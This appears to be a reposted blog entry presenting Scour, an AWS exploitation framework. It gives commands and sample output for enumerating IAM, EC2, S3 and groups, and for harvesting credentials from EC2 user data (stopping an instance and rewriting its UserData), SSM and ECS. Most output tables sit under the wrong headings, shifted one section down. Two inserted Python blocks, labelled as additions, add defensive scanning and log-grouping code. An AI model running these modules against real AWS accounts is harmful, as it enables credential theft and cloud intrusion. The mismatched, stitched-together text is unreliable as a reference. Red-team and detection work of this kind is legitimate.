Scour: An Exploitation Framework for AWS
2021-08-21 14:17:34

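About Scour

Scour is an exploitation framework for AWS. It is written in Golang and designed for red team testing and blue team analysis. Scour incorporates many modern techniques that can be used to attack an environment or to build defensive detections.

Features

Command completion

Dynamic resource listing

Command history

Blue team mode (tags attacks with a unique user agent)

Installation

Scour is written in Golang, and installing and using it is simple and convenient.

Get the source: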

go get github.com/grines/scour

Build:

go build main.go

Basic Scour commands

Enumerate all available AWS profiles stored in ~/.aws/credentials:

token profile <profile_name> <region>

View a same-account or cross-account role (requires an active session):

token AssumeRole <role_name> <region>

View help for a given module:

help module

Run the specified module with default parameters:

attack evasion <tactic>

Running Scour from the command line

Enter Scour's command-line mode:

scour

Set the session used to execute commands:

Not Connected <> token profile apiuser us-east-1

Connect to an AWS account:

Connected <apiuser/us-east-1>

Enumeration

IAM discovery

Connected <apiuser/us-east-1> attack enum IAM
+-------------+---------------------+------------------+---------------+--------------+
|    USER     |  MANAGED POLICIES   | INLINE POLICIES  |    GROUPS     | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin       | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true         |
| EC2         | AmazonEC2FullAccess |                  |               | true         |
+-------------+---------------------+------------------+---------------+--------------+

Role discovery

Connected <apiuser/us-east-1> attack enum Roles
+-------------+---------------------+------------------+---------------+--------------+
|    USER     |  MANAGED POLICIES   | INLINE POLICIES  |    GROUPS     | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin       | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true         |
| EC2         | AmazonEC2FullAccess |                  |               | true         |
+-------------+---------------------+------------------+---------------+--------------+

EC2 discovery

Connected <apiuser/us-east-1> attack enum EC2
UA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
|                            ROLE                            | PRINCIPAL TYPE |                  IDENTITY/SERVICE                   | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m                                | AWS            | [arn:aws:iam::861293084598:root                     | true         |
|                                                            |                | codebuild.amazonaws.com]                            |              |
| Amazon_CodeBuild_f2DOFPjMHK                                | Service        | [codebuild.amazonaws.com]                           | true         |
| Amazon_CodeBuild_HS59ko7lxn                                | Service        | [codebuild.amazonaws.com]                           | true         |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+

S3 discovery

Connected <apiuser/us-east-1> attack enum S3
UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
|     INSTANCEID      |                  INSTANCE PROFILE                   |     VPC      | PUBLICIP |   PRIVATEIP   |   SECURITY GROUPS    | PORTS  |  STATE  | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None                                                | vpc-7e830c1a | None     | 172.31.53.199 | sg-09fcd28717cf4f512 | 80*    | stopped | false        | true     |
|                     |                                                     |              |          |               |                      | 22*    |         |              |          |
|                     |                                                     |              |          |               |                      | 5000*  |         |              |          |
| i-03657fe3b9decdf51 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.45.96  | sg-61b1fd07          | All*   | stopped | true         | true     |
|                     |                                                     |              |          |               |                      | 8888*  |         |              |          |
| i-01b265a5fdc45df57 | None                                                | vpc-7e830c1a | None     | 172.31.38.118 | sg-0392f752f9b849d3f | 3389*  | stopped | false        | true     |
| i-0867709d6c0be74d9 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.39.199 | sg-006543a34d2f70028 | 22*    | stopped | true         | true     |
| i-0d95790b5e7ddff23 | None                                                | vpc-7e830c1a | None     | 172.31.12.57  | sg-e1a50dac          | 33391* | stopped | false        | true     |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+

Group discovery

Connected <apiuser/us-east-1> attack enum Groups
UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
|                  BUCKET                   | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION |  REGION   |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a               | false     | false     | false        |             | false               |             | false       | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true      | false     | false        |             | false               |             | false       |           |
| bullsecu*********                         | true      | true      | false        |             | false               |             | false       |           |
| connect-6ec*****ad67                      | false     | false     | false        |             | false               |             | false       |           |
| connect-******5337c3                      | false     | false     | false        |             | false               |             | false       |           |
| ransom********                            | true      | false     | false        |             | false               |             | false       |           |
| red********                               | false     | false     | false        |             | false               |             | false       |           |
| rep-*****                                 | false     | false     | false        |             | false               |             | false       | us-west-2 |
| terraform*******                          | false     | false     | false        |             | false               |             | false       |           |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+

Network discovery

Connected <apiuser/us-east-1> attack enum Network
UA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
|                     GROUP                     |      POLICIES       | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2                                           | SecurityAudit       | false        |                 | false        |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 |                     | false        |                 | false        |
| TestGroup                                     | AmazonEC2FullAccess | true         |                 | false        |
|                                               | SecurityAudit       |              |                 |              |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+

Credential discovery

Extract credentials from EC2 user data:

Connected <apiuser/us-east-1> attack creds UserData
[Sun May  9 06:10:16 2021]  INF  Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May  9 06:10:46 2021]  INF  Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May  9 06:10:47 2021]  INF  Starting Instance i-0f5604708c0b51429 - State: pending

Extract credentials from Systems Manager:

Connected <apiuser/us-east-1> attack creds SSM
UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
|     INSTANCEID      |       RULE       |                                    FINDING                                    |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook    | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword                                                      |
+---------------------+------------------+-------------------------------------------------------------------------------+
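The findings table above (tagged userdata-creds) reports rule matches such as "Slack Webhook" and "Generic Password" in instance user data. The same kind of check can be run as a self-audit of your own instances; this is an added example, not code from Scour, and its two regexes, the redaction step and the constructed sample are assumptions modelled on the rule names and placeholder values shown in the table.

```python
import base64
import re

# Hypothetical rules named after the RULE column in the output above;
# the regexes are this example's own, not Scour's.
RULES = {
    "Slack Webhook": re.compile(
        r"https://hooks\.slack\.com/services/T[A-Za-z0-9]+/B[A-Za-z0-9]+/[A-Za-z0-9]+"),
    "Generic Password": re.compile(
        r"(?i)(?:password|passwd|pwd)\s*[=:]\s*[\"']?([^\s\"']{4,})"),
}

def redact(value, keep=4):
    """Keep a short prefix for triage and mask the rest so the report leaks nothing."""
    return value[:keep] + "*" * max(len(value) - keep, 0)

def scan_user_data(instance_id, user_data_b64):
    """Decode base64 user data (the form the EC2 API returns) and list redacted findings."""
    try:
        text = base64.b64decode(user_data_b64, validate=True).decode("utf-8", "replace")
    except (ValueError, TypeError):
        # Malformed base64 is reported rather than silently skipped.
        return [(instance_id, "Undecodable UserData", "")]
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in RULES.items():
            for m in pattern.finditer(line):
                secret = m.group(1) if m.groups() else m.group(0)
                findings.append((instance_id, rule, f"line {lineno}: {redact(secret)}"))
    return findings

# Constructed sample: a boot script reusing the placeholder values from the table above.
SAMPLE = base64.b64encode(b"""#!/bin/bash
export HOOK=https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX
echo "password=thisisapassword" >> /etc/app.conf
echo done
""").decode()

if __name__ == "__main__":
    for finding in scan_user_data("i-0f5604708c0b51429", SAMPLE):
        print(finding)
```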

Retrieve credentials from ECS:

Connected <apiuser/us-east-1> attack creds ECS
UA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE |        VALUE         |
+------------+----------+----------------------+
| Test       | text     | thismightbeapassword |
+------------+----------+----------------------+
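Blue team mode marks each module run with a user agent tag, visible in the "UA Tracking" lines of the output above. The following added example (not code from Scour) groups CloudTrail records by that tag so a test run can be separated from other activity; it assumes the tag appears as a substring of the record's userAgent field and that its three segments are a session ID, a run ID and a module name, and all records are constructed samples.

```python
import re
from collections import defaultdict

# Tag shape inferred from the "UA Tracking" lines on this page:
# exec-env/<10-char id>/<10-char id>/<module>. Reading the first id as a
# session and the second as one module run is an assumption.
TAG = re.compile(r"exec-env/([A-Za-z0-9]{10})/([A-Za-z0-9]{10})/([a-z0-9-]+)")

def group_tagged_events(records):
    """Map (session, run, module) -> the API calls recorded under that tag."""
    runs = defaultdict(list)
    for rec in records:
        match = TAG.search(rec.get("userAgent", ""))
        if match:
            runs[match.groups()].append({
                "time": rec.get("eventTime"),
                "call": f'{rec.get("eventSource")}:{rec.get("eventName")}',
                "principal": rec.get("userIdentity", {}).get("arn"),
                "source_ip": rec.get("sourceIPAddress"),
            })
    return dict(runs)

def modules_by_session(runs):
    """Collapse runs into sessions: session id -> sorted module names seen."""
    seen = defaultdict(set)
    for session, _run, module in runs:
        seen[session].add(module)
    return {session: sorted(mods) for session, mods in seen.items()}

def _record(time, source, name, user_agent):
    # Constructed CloudTrail record, trimmed to the fields used above.
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "sourceIPAddress": "198.51.100.7", "userAgent": user_agent,
            "userIdentity": {"arn": "arn:aws:iam::111122223333:user/apiuser"}}

SDK = "aws-sdk-go/1.38.0 (go1.16; linux; amd64) "  # constructed prefix
SAMPLE_LOG = [
    _record("2021-05-09T06:01:10Z", "iam.amazonaws.com", "ListRoles",
            SDK + "exec-env/EVSWAyidC4/o18HtFPe1P/role-enum"),
    _record("2021-05-09T06:02:31Z", "ec2.amazonaws.com", "DescribeInstances",
            SDK + "exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum"),
    _record("2021-05-09T06:09:02Z", "ec2.amazonaws.com", "DescribeInstanceAttribute",
            SDK + "exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds"),
    _record("2021-05-09T06:12:00Z", "s3.amazonaws.com", "ListBuckets", "aws-cli/2.2.0"),
]

if __name__ == "__main__":
    for session, modules in modules_by_session(group_tagged_events(SAMPLE_LOG)).items():
        print(session, modules)
```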

Project link

Scour: [GitHub link]
